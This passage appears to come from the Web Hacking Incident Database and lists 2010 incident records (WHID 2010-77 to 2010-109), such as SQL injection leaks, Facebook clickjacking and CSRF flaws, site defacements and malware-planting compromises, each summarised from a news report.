Incident Description: The computer system at a local Mexican restaurant was hacked, and investigators believe thieves made off with the credit card numbers of hundreds of customers. "They know that it was a breach, and they know that the breach came from Russia, that's for sure," explained Blanca Aldaco. "So, we are working with our I.T. guy. They're definitely looking into. Hopefully, they can figure out what the IP address is." The U.S. Secret Service and the San Antonio Police Department's Fraud Unit is also investigating. Neither would comment, but News 4 WOAI learned they are trying to track down the overseas hacker. The restaurant's owner said they have now changed the way they do business. "We are no longer on the internet when it comes to credit card authorizations," Blanca Aldaco told News 4 WOAI.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.woai.com/news/local/story/Local-restaurants-computer-hacked-customers-card/NSwj0Mpf5keeSXLOfsGvCw.cspx
Attack Source Geography: Russia
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-109: Viral clickjacking 'Like' worm hits Facebook users
WHID ID: 2010-109
Date Occured: 5/31/2010
Attack Method: Clickjacking
Application Weakness: Insufficient Process Validation
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Hundreds of thousands of Facebook users have fallen for a social-engineering trick which allowed a clickjacking worm to spread quickly over Facebook this holiday weekend.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.sophos.com/blogs/gc/g/2010/05/31/viral-clickjacking-like-worm-hits-facebook-users/
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-108: Cyber Thieves Rob Treasury Credit Union
WHID ID: 2010-108
Date Occured: 5/20/2010
Attack Method: Banking Trojan
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: Organized cyber thieves stole more than $100,000 from a small credit union in Salt Lake City last week, in a brazen online robbery that involved dozens of co-conspirators, KrebsOnSecurity has learned. According to Melgar, the perpetrators who set up the bogus transactions had previously stolen a bank employee’s online login credentials after infecting the employee’s Microsoft Windows computer with a Trojan horse program. Melgar said investigators have not yet determined which particular strain of malware had infected the PC, adding that the bank’s installation of Symantec’s Norton Antivirus failed to detect the infection prior to the unauthorized transfers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://krebsonsecurity.com/2010/05/cyber-thieves-rob-treasury-credit-union/
Attack Source Geography: Ukraine
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-107: Hackers Take Over BP Twitter Feed
WHID ID: 2010-107
Date Occured: 5/27/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Disinformation
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: BP's Twitter account looked to have fallen victim to hackers early Thursday, with a post referencing a fictional character from a popular fake BP microblog page. Followers to the genuine account were told: "Terry is now in charge of operation Top Kill, work will recommence after we find a XXL wetsuit. #bpcares #oilspill."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.foxnews.com/scitech/2010/05/27/hackers-bp-twitter-feed/
Attack Source Geography:
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-106: AMC website vulnerable to hackers
WHID ID: 2010-106
Date Occured: 5/27/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: India
Incident Description: With a weak network security, the website http:// www.egovamc.com. has several chinks in its armour and is a ready invitation for hackers. The issue has been brought to notice of senior AMC officials and only recently they effected a few cosmetic security patch-ups for their website. “We have reported the bugs in the website and problems with database management system and coding. We had earlier told the systems department of the AMC about a system that can be exploited with username and password as simple ‘0’. The vulnerability has been fixed by now but there are bigger challenges,” said Sunny Vaghela, a city-based cyber crime expert. He said that if the website is vulnerable , it means that the hacker can get access to the control panel of the site, look into the contents such as tendering details, property tax details , building plans and allocation of funds, access to which is restricted to only senior-level civic officials.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://timesofindia.indiatimes.com/articleshow/5979202.cms
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-105: Poll removed due to widespread ballot stuffing and hacking
WHID ID: 2010-105
Date Occured: 5/25/2010
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Fraud
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description: Dear users, yesterday we began a poll about the controversial immigration bill SB 1070 asking users what was their sentiment on the bill. It spread virally and was shared on facebook over 500 times and viewed over 10,000 times. Unfortunately all the of attention has made it the target of some unscrupulous individuals. Around 3:00pm Tuesday afternoon we noticed that an individual was voting in the poll once every 10 seconds, and did this activity for nearly 2 hours. Upon checking the logs we realized there were multiple users engaging in this sort of behavior from multiple vectors forcing us to remove the poll entirely. In terms of a long term solution, it seems inevitable that we will adopt a system that requires a KVOA.com user account in order to vote in a poll, but that modification cannot be patched in on the fly and would require a few days work.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.kvoa.com/news/poll-removed-due-to-widespread-ballot-stuffing-and-hacking/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-104: Code Security: MidAmerican Energy's top priority after SQL injection attacks
WHID ID: 2010-104
Date Occured: 5/21/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Energy
Attacked Entity Geography: USA
Incident Description: "Last May we had an incident where one of our web pages was exploited through an SQL injection flaw," Kerber said. "It was a wake-up call that we had vulnerabilities people could find out about."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.csoonline.com/article/594613/Code_Security_MidAmerican_Energy_s_top_priority_after_SQL_injection_attacks
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-103: SEO SPAM network - Details of the wp-includes infection
WHID ID: 2010-103
Date Occured: 5/25/2010
Attack Method: Content Spoofing
Application Weakness: Application Misconfiguration
Outcome: Link Spam
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description: We have been digging lately in a large SEO SPAM network which is using thousands of compromised sites to increase their page rankings and spread malware. They are similar to the one we reported earlier affecting lean.mit.edu, but this time they seem focused only on Wordpress web sites Attack method All the sites infected are using the latest Wordpress version and had a PHP script injected inside their wp-includes directory. The script name is random and it does two things: 1-For a search engine, it shows a bunch of keywords (cialis, viagra, movie downloads, etc) 2-For a normal user coming from Google, they are redirected to a web site with malware or to another site for more spam.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.sucuri.net/2010/05/seo-spam-network-details-of-wp-includes.html
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-102: Denver's website hacked twice in one week
WHID ID: 2010-102
Date Occured: 5/25/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: The city and county of Denver website was pulled down Monday night after it was hacked, the second such attack in a week. Eric Brown, a spokesman for the mayor's office, said he didn't know what time the site was breached and when it might be restored.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.denverpost.com/news/ci_15155519
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-101: 37 million passwords stolen on the site of Skyrock?
WHID ID: 2010-101
Date Occured: 5/21/2010
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: France
Incident Description: A hacker broke the huge database site which had registered 36.7 million Internet users, raising fears of massive consequences. The Site Skyrock has sent a message to its internet users the message of the team to its Internet Skyrock According Zataz, the hacker would be introduced through a security hole in the platform Waka , launched last week in partnership with the government . This ” backdoor “, which allowed anyone to edit the content of pages, had been quickly corrected. For its part, Skyrock believes that “at this stage, we cannot determine whether the application Waka was concerned.” Still, the hacker could have access to the huge database Skyrock.com, claiming “36.7 million active members in February 25. However, the head of security at the site revealed Monde.fr than Skyrock, passwords are stored in “plain” , that is to say they are not encrypted and protected.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://whitehatfirm.com/news/37-million-passwords-stolen-on-the-site-of-skyrock/2629.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-100: Chinaz.com compromised
WHID ID: 2010-100
Date Occured: 5/25/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Information Services
Attacked Entity Geography: China
Incident Description: Websense Security Labs™ ThreatSeeker™ Network has discovered that the speed testing site of chinaz.com has been compromised. This payload contains two parts: ap.js, and the obfuscation code in the script tag. When combined, we get the entire exploit code. After analyzing this, we noticed that it is used to target the IE vulnerability (MS10-018), which downloads an executable file named dn.exe. This has a good detection rate by most AV vendors; however dn.exe will download and execute remote files and send local information to a remote server. The process disguises itself as an AV component while at the same time suspending the AV software. At present, a bug in the malicious code fails to get the MAC address correctly and as of this alert the site is still infected.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://community.websense.com/blogs/securitylabs/archive/2010/05/25/chinaz-com-compromised.aspx
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-99: Got an iTunes account? That's music to a cyber fraudster's ears
WHID ID: 2010-99
Date Occured: 5/22/2010
Attack Method: Brute Force
Application Weakness: Insufficient Password Recovery
Outcome: Session Hijacking
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Up to 125million people worldwide have accounts set up on the site. But computer security experts say hackers are easily hijacking accounts by pretending they are a customer who has forgotten their password. As with many websites, iTunes tells users to select a socalled 'security question' from a list of options when they first set up their account. These are fairly basic and include 'what is your mother's maiden name?' and 'where did you spend your honeymoon?'. Customers who have forgotten their passwords are prompted with the question they first selected when they set up their profile - as long as they give the correct answer, they can access the account. Security analysts claim this is leaving the website wide open to fraud. Hackers simply pretend they are a customer who has forgotten their password and can easily work out the answer to the personal question using information that users have posted on social-networking websites such as Facebook and Twitter.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.dailymail.co.uk/news/article-1280354/Got-iTunes-account-Thats-music-cyber-fraudsters-ears.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-98: Man charged with attacking O'Reilly, Coulter websites
WHID ID: 2010-98
Date Occured: 5/19/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description: A former college student has been charged with using the school's computer network to control a botnet and launch distributed denial-of-service (DDoS) attacks against conservative websites belonging to Bill O'Reilly, Ann Coulter and Rudy Giuliani.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.scmagazineus.com/man-charged-with-attacking-oreilly-coulter-websites/article/170524/
Attack Source Geography: USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-97: Microsoft files two lawsuits for "click laundering"
WHID ID: 2010-97
Date Occured: 5/20/2010
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Abuse of Functionality
Outcome: Fraud
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description: Microsoft this week filed two lawsuits in federal court in Seattle against alleged perpetrators of a new, technologically advanced form of online advertising click fraud being dubbed "click laundering." According to Microsoft, click fraud is an online advertising scam that occurs when a person or computer program imitates a legitimate user and clicks on an online ad for the purpose of generating a fraudulent “charge-per-click,” without having any interest in the ad. Click laundering, meanwhile, is a more advanced form of click fraud designed to outwit fraud detection systems by hiding the origin of fake clicks.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.scmagazineus.com/microsoft-files-two-lawsuits-for-click-laundering/article/170621/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-96: Facebook scrambles to close CSRF hole exposing private data
WHID ID: 2010-96
Date Occured: 5/19/2010
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Facebook engineers are finishing a patch for a critical vulnerability that exposed user birthdays and other sensitive data even when they were designated as private, a security researcher said Wednesday. At time of writing, much of the CSRF (cross-site request forgery) bug appeared to have been patched, Keith said. However, as noted earlier by IDG News, attackers still could exploit the flaw to control a user's "like" functions, which are used to endorse ads and other types of content. The flaw involved a piece of code Facebook engineers dubbed "post_form_id," which is used to ensure that commands can be issued only by browsers that have previously logged into the website. Keith discovered a simple way to bypass the security token: by omitting it altogether, Facebook servers no longer attempted to validate browsers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/05/19/facebook_private_data_leak/
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link: http://www.itworld.com/security/108279/facebook-fixing-embarrassing-privacy-bug
Entry Title: WHID 2010-95: Fraud Bazaar Carders.cc Hacked
WHID ID: 2010-95
Date Occured: 5/18/2010
Attack Method: Misconfiguration
Application Weakness: Improper Filesystem Permissions
Outcome: Leakage of Information
Attacked Entity Field: Hacking
Attacked Entity Geography: Germany
Incident Description: Carders.cc, a German online forum dedicated to helping criminals trade and sell financial data stolen through hacking, has itself been hacked. The once-guarded contents of its servers are now being traded on public file-sharing networks, leading to the exposure of potentially identifying information on the forum’s users as well as countless passwords and credit card accounts swiped from unsuspecting victims.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://krebsonsecurity.com/2010/05/fraud-bazaar-carders-cc-hacked/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-94: Hacker steals 22,000 e-mail address, demands Astley tune
WHID ID: 2010-94
Date Occured: 5/19/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Media
Attacked Entity Geography: Netherlands
Incident Description: Dutch hacker Darkc0ke hijacked a radio station database containing 22,000 e-mail addresses and threatened to publish them unless the station play Rick Astley's "Never Gonna Give You Up," a variation of an Internet meme known as "rickrolling." "It was a joke," Darkc0ke said via e-mail. "They didn't play the song. Why can't they do someone a favor, just for once?" Darkc0ke said he cracked the database using a basic SQL injection to exploit a security vulnerability. The hacker is known for breaking into databases. Last year, he stole a database containing 46,000 e-mail addresses from the Dutch magazine Autoweek.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.idg.no/cw/art.cfm?id=B143BFED-1A64-6A71-CE6E57CCCFC37786
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-93: Huge 'sexiest video ever' attack hits Facebook
WHID ID: 2010-93
Date Occured: 5/18/2010
Attack Method: Rogue 3rd Party App
Application Weakness: Insufficient Process Validation
Outcome: Planting of Malware
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: A huge attack by a rogue Facebook application last weekend infected users' PCs with popup-spewing adware, a security researcher said Monday. On Saturday, AVG Technologies received more than 300,000 reports of the malicious Facebook app, said Roger Thompson, AVG's chief research officer. AVG came up with its tally by counting the number of reports from its LinkScanner software, a free browser add-on that detects potentially poisoned pages. "It was stunning, really, the number," said Thompson in an interview via instant message late Monday. "And stunning that it was not viral or wormy [but that] Facebook did it all by itself." The volume of reports on Saturday's rogue Facebook software was highest during the nine-hour period between midnight and 9 a.m. Eastern, with spikes of approximately 40,000 per hour coming at 7 a.m. and noon. For the day, AVG received more than 300,000 reports, triple that of AVG's second-most-reported piece of spyware. According to Thompson, Facebook eradicated the rogue application about 15 hours after the attack started. Facebook's only acknowledgment of the attack came on its security page, where a "Tip of the Week" Monday morning read: "Don't click on suspicious-looking links, even if they've been sent or posted by friends."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.computerworld.com/s/article/9176905/Huge_sexiest_video_ever_attack_hits_Facebook
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-92: SQL Injection attack used in breach of 168,000 Netherlands travelers
WHID ID: 2010-92
Date Occured: 5/18/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: Netherlands
Incident Description: An attacker has discovered a serious flaw in a website set up to encourage the use of smart cards for public transportation in the Netherlands, resulting in the leakage of personal information of more than 168,000 travelers. The website offered a coupon for a free trip using the OV smart card system and was set up to promote the new system which is being slowly rolled out throughout the region. According to Webwerld, a tech publication based in the Netherlands, the names, addresses and telephone numbers of individuals who signed up were publicly available as a result of the flaw. Information about the flaw was exposed by an anonymous hacker who gave the magazine a video demonstrating the error using a SQL injection attack. The hacker told the magazine that he made the flaw publicly available because there is no excuse for simple website mistakes. The website has since been taken offline.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://itknowledgeexchange.techtarget.com/security-bytes/sql-injection-attack-used-in-breach-of-168000-netherlands-travelers/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-91: Twitter software bug forces followers
WHID ID: 2010-91
Date Occured: 5/10/2010
Attack Method: Misconfiguration
Application Weakness: Insufficient Process Validation
Outcome: Disinformation
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Twitter users had a big shock on Monday when they checked into the micro-blogging service. Their follower and following numbers were at 0, meaning they were suddenly very unpopular or something was seriously wrong with the site. It was the latter, of course. To kill a bug that allowed a user to force other users to follow him or her, Twitter temporarily reset all follower/following counts to zero, according to the Twitter Status blog. Everything was back to normal by 11 a.m. Pacific.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.pcworld.com/article/195962/
Attack Source Geography:
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-90: Facebook Board Member's Account Compromised
WHID ID: 2010-90
Date Occured: 5/10/2010
Attack Method: Unknown
Application Weakness: Insufficient Authentication
Outcome: Phishing
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: A Facebook message sent out on Saturday from the account of company board member Jim Breyer to over 2,300 "friends" turns out to have been too good to be true. The message, an invitation to an event at which attendees would be given a "Facebook phone number," was a phishing attack, designed to capture information from recipients. The incident underscores the risk of supplying Facebook with data that might be better kept private. Facebook's appeal to cybercriminals arises from the high level of trust that users extend to Facebook messages, which are generally presumed to come from friends. Compromising someone's Facebook account also provides immediate access to a pool of new potential victims: the friends of the person whose account has been hacked.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.informationweek.com/news/software/showArticle.jhtml?articleID=224701441
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-89: Breaking News: WordPress Hacked with Zettapetta on DreamHost
WHID ID: 2010-89
Date Occured: 5/6/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Service Providers
Attacked Entity Geography: USA
Incident Description: Early this morning, we received reports that WordPress blogs were hacked on Linux shared-hosting at DreamHost, as well as other hosting companies. This is dangerous scareware which tries to install a virus on your visitor's computer. WordPress, Zencart and other php-based platforms were hit. Our earliest hacked site report is of 5/6/2010 @ 9:17am. This malware was just detected and is not showing up on website malware scanners yet. We have notified sucuri.net of this latest infection so that they can immediately update their malware detections systems.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.wpsecuritylock.com/breaking-news-wordpress-hacked-with-zettapetta-on-dreamhost/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-88: phpnuke.org has been compromised
WHID ID: 2010-88
Date Occured: 5/7/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description: Websense® Security Labs™ ThreatSeeker™ Network has discovered that the popular Web site, phpnuke.org, has been compromised. PHP-Nuke is a popular Web content management system (CMS), based on PHP and a database such as MySQL, PostgreSQL, Sybase, or Adabas. Earlier versions were open source and free software protected by GNU Public License, but since then it has become commercial software. As it is still very popular in the Internet community, it is not surprising that it has become a target of blackhat attacks. The injected iframe hijacks the browser to a malicious site, where through several steps of iframe redirections the user finally ends up on a highly obfuscated malicious page.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://community.websense.com/blogs/securitylabs/archive/2010/05/07/phpnuke-org-has-been-compromised.aspx
Attack Source Geography:
Attacked System Technology: PHPNuke
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-87: Facebook hacker jailed after falsely accusing boyfriend of rape
WHID ID: 2010-87
Date Occured: 5/6/2010
Attack Method: Brute Force
Application Weakness: Insufficient Authentication
Outcome: Disinformation
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: A young mother who had accused her ex-boyfriend of rape hacked into his Facebook site to post a threat to herself to bolster her fakery. Zoe Williams was described as "really wicked" by the judge, who jailed her for four months. A court heard she tried to set up her ex-boyfriend partner after accused him of raping her several times after the end of their five-year relationship in 2007.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.telegraph.co.uk/technology/facebook/7685381/Facebook-hacker-jailed-after-falsely-accusing-boyfriend-of-rape.html
Attack Source Geography: USA
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-86: China State News Agency Web Site Hit With Malware
WHID ID: 2010-86
Date Occured: 5/6/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: China
Incident Description: A section of the Web site for China's state-run Xinhua news agency was found to be distributing malware last month, according to a Google malware scanning service that is still labeling the site as potentially harmful. The "news center" section of the Xinhua's Web site, which displays a feed of the agency's stories, was found to have one scripting exploit and one Trojan on it during a scan, according to a Google Safe Browsing diagnostic page. No suspicious content was found on the site during a scan about ten days later, but the section of Xinhua's Web site is still being labeled potentially harmful in Google search results.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.yahoo.com/s/pcworld/20100506/tc_pcworld/chinastatenewsagencywebsitehitwithmalware
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-85: Facebook flaw exposes live chats
WHID ID: 2010-85
Date Occured: 5/6/2010
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Facebook has again come under fire for not doing enough to protect personal information after a security flaw allowed users to eavesdrop on private chat sessions. The flaw also allowed Facebook members to view other people's pending friend requests. The social networking site, which has more than 400 million active users, was forced to suspend the live chat function until engineers were able to fix the problem. The flaw was in the Facebook feature that allows users to view their own privacy settings and could be easily exploited to view others' private information, according to TechCrunch blogger Steve O'Hear, who alerted the social networking site.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.infosecurity-magazine.com/view/9245/facebook-flaw-exposes-live-chats/
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-84: PHP Website XSS Defacement
WHID ID: 2010-84
Date Occured: 5/2/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description: Cross-site scripting , html injection and redirect on bugs.php.net and phpbuilder.com Screenshots and proof of concept Redirect from php site to google POC and XSS Sample xss alert on phpbuilder.com And now what about http://doc.php.net/phd/ar/phd/ ?
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://security-sh3ll.blogspot.com/2010/05/php-website-xss-defacement.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-83: High-profile tech blog is hacked
WHID ID: 2010-83
Date Occured: 1/26/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Media
Attacked Entity Geography:
Incident Description: High-profile technology blog TechCrunch has been taken offline by hackers. A message on the site said that it had been "compromised by a security exploit" but did not specify any further details. "We're working to identify the exploit and will bring the site back online shortly," the message read. The site went down at around 0620 GMT and was replaced by various messages including a link to a site directing people towards adult material.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.bbc.co.uk/2/hi/technology/8480306.stm
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-82: Victorian councils, libraries taught security in hack
WHID ID: 2010-82
Date Occured: 5/3/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Australia
Incident Description: A hacker has busted the security of eight Victorian Government websites in a string of minor attacks on Sunday. Purportedly hailing from an Indonesian hacking group, the hacker made unobtrusive defacements by inserting a text document into the homepages of six local council sites and two libraries.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.networkworld.com/news/2010/050310-victorian-councils-libraries-taught-security.html
Attack Source Geography: Indonesia
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-81: Network Solutions customers hit by mass hack attack
WHID ID: 2010-81
Date Occured: 4/19/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Service Providers
Attacked Entity Geography: USA
Incident Description: Network Solutions' security team is battling a mysterious attack that has silently infected a "huge" number of the websites it hosts with malicious code. The mass compromise affects sites running WordPress, Joomla, and plain-vanilla HTML, according to reports here and here from Securi Security and Stop Malvertising. Many of the infected sites include encoded javascript that secretly attempts to install malware on visitors' computers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/04/19/network_solutions_mass_hack/
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link: http://blog.sucuri.net/2010/04/network-solutions-hacked-again.html
Entry Title: WHID 2010-80: Hacked US Treasury websites serve visitors malware
WHID ID: 2010-80
Date Occured: 5/3/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: Updated Websites operated by the US Treasury Department are redirecting visitors to websites that attempt to install malware on their PCs, a security researcher warned on Monday. The infection buries an invisible iframe in bep.treas.gov, moneyfactory.gov, and bep.gov that invokes malicious scripts from grepad.com, Roger Thompson, chief research officer of AVG Technologies, told The Register. The code was discovered late Sunday night and was active at time of writing, about 12 hours later.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/05/03/treasury_websites_attack/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-79: Italian expert: the attack of Romanian hackers against La Stampa and Corriere newspapers was the most relevant in the last eight years
WHID ID: 2010-79
Date Occured: 4/30/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Media
Attacked Entity Geography: Italy
Incident Description: On April 30, a group of hackers, who sign as "Romanian National Security" attacked three of the most important media sites in Italy: La Stampa, Corriere della Sera and RAI. The Romanian hackers left a message inviting Italian journalists to avoid confusions between Romanians and gypsies. The same group attacked in the last month the sites of the Daily Telegraph and Le Monde. However, unlike the British and French media, the Italian mass media did not mention the attack. Our HotNews.ro corresponded to Italy interviewed Italin Matteo Cavallini, responsible for IT security in the Commerce Ministry. He was one of the first Italians to raise the awareness about the attack of the Romanians hackers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://english.hotnews.ro/stiri-regional_europe-7212366-italian-expert-the-attack-romanian-hackers-against-stampa-and-corriere-newspapers-was-the-most-relevant-the-last-eight-years.htm
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-78: Butler County Election Website Hacked
WHID ID: 2010-78
Date Occured: 5/5/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: The Butler County Sheriff will investigate an alleged hacking incident that brought down election computers in that county last night, and slowed the reporting of votes. The Board of Election tells our partners at the Journal News that the problem affected the reporting of vote totals, not the counting of votes itself. The BOE says three services crashed during the incident and two unidentified sites were deliberately diverting traffic from the website. The BOE believes the attack was deliberate.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.local12.com/news/local/story/Butler-County-Election-Website-Hacked/zsQw7iXCgkuoDeMvyY3dGA.cspx
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-77: Kilpatrick's site down, spokesman suspects hackers
WHID ID: 2010-77
Date Occured: 5/5/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: USA
